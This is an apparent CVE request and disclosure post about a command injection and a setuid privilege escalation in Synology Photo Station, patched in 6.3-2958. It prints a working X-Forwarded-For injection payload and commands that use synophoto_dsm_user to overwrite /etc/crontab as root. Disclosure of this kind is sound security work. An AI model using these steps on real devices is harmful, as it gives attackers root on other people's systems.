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CVE request: Synology Photo Station command injection and privilege escalation

From: "lucas_leong () trend com tw" <lucas_leong () trend com tw>
Date: Thu, 28 Jan 2016 06:31:46 +0000

Title: Synology Photo Station command injection and privilege escalation
Vendor: Synology (https://www.synology.com/)
Product: Photo Station
Status: Patch released
Affected: version <= 6.3-2954
Impact: Any guest account can execute arbitrary command with root permission

Vulnerability 1: Command injection

The vulnerability is in appstore/PhotoStation/photo/login.php

118     if ($x_forward) {
119         $ip = $x_forward;
120     }
176     $commend = "/usr/syno/bin/synoautoblock --reset \"".$ip."\"";
177     @system($commend, $retval);

Since, the page did not filter X-Forwarded-For header and lead to command injection
After sending a crafted header, a command is executed under http permission

X-Forwarded-For: ";id>/tmp/hack;"

cat /tmp/hack
uid=1023(http) gid=1023(http) groups=1023(http)

Vulnerability 2: Privilege escalation

For the privilege escalation vulnerability, it is a simple setuid problem.

ls -al /usr/syno/bin/synophoto_dsm_user
lrwxrwxrwx    1 root     root            56 Sep 16 22:53 /usr/syno/bin/synophoto_dsm_user -> 
ls -al /var/packages/PhotoStation/target/bin/synophoto_dsm_user
-rwsr-xr-x    1 root     root         30520 Jul  6 19:55 /var/packages/PhotoStation/target/bin/synophoto_dsm_user
ls -al /tmp/hack2
-rw-rw-rw-    1 http     http            15 Sep 23 00:24 /tmp/hack2
cat /tmp/hack2
pwned by lucas
ls -al /etc/crontab
-rw-r--r--    1 root     root           404 Aug 27 13:25 /etc/crontab
synophoto_dsm_user --copy-no-ea /tmp/hack2 /etc/crontab
cat /etc/crontab
pwned by lucas

After overwritng crontab, arbitrary process can be executed with root permission

Vendor released the patch and the issue has solved in 6.3-2958

2015/09/23         Vendor Notified
2015/10/01         Patch Released

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